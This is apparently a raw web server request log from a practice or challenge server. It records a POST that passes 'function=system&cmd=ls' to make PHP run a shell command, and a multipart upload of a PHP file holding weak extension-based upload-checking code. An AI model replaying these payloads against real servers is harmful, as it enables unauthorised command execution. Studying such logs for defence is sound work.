--------------------------------------------------
[18-12-21 10:53:48]
SRC IP: 222.18.127.49
POST /index.php HTTP/1.1
Host: 47.106.182.92:30001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=unfs48427tro0rts8b02r81kv7
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

function=system&cmd=ls

--------------------------------------------------
[18-12-21 10:53:52]
SRC IP: 222.18.127.49
GET /index.php HTTP/1.1
Host: 47.106.182.92:30001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=unfs48427tro0rts8b02r81kv7
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[18-12-21 10:55:41]
SRC_IP: 222.18.127.49
POST /index.php HTTP/1.1
Host: 47.106.182.92
Content-Length: 1578
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCRTk4plP13QW7GDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/test.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=s9t3ac1vjg06o2orihp836dgm1
Connection: close

------WebKitFormBoundaryCRTk4plP13QW7GDH
Content-Disposition: form-data; name="username"

xxx
------WebKitFormBoundaryCRTk4plP13QW7GDH
Content-Disposition: form-data; name="file1"; filename="function.php"
Content-Type: application/octet-stream

<?php 
//show_source(__FILE__); 
include "base.php"; 
//header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    var_dump($filename);
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    }
    var_dump($_FILES["file"]["tmp_name"]);
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?> 
------WebKitFormBoundaryCRTk4plP13QW7GDH--
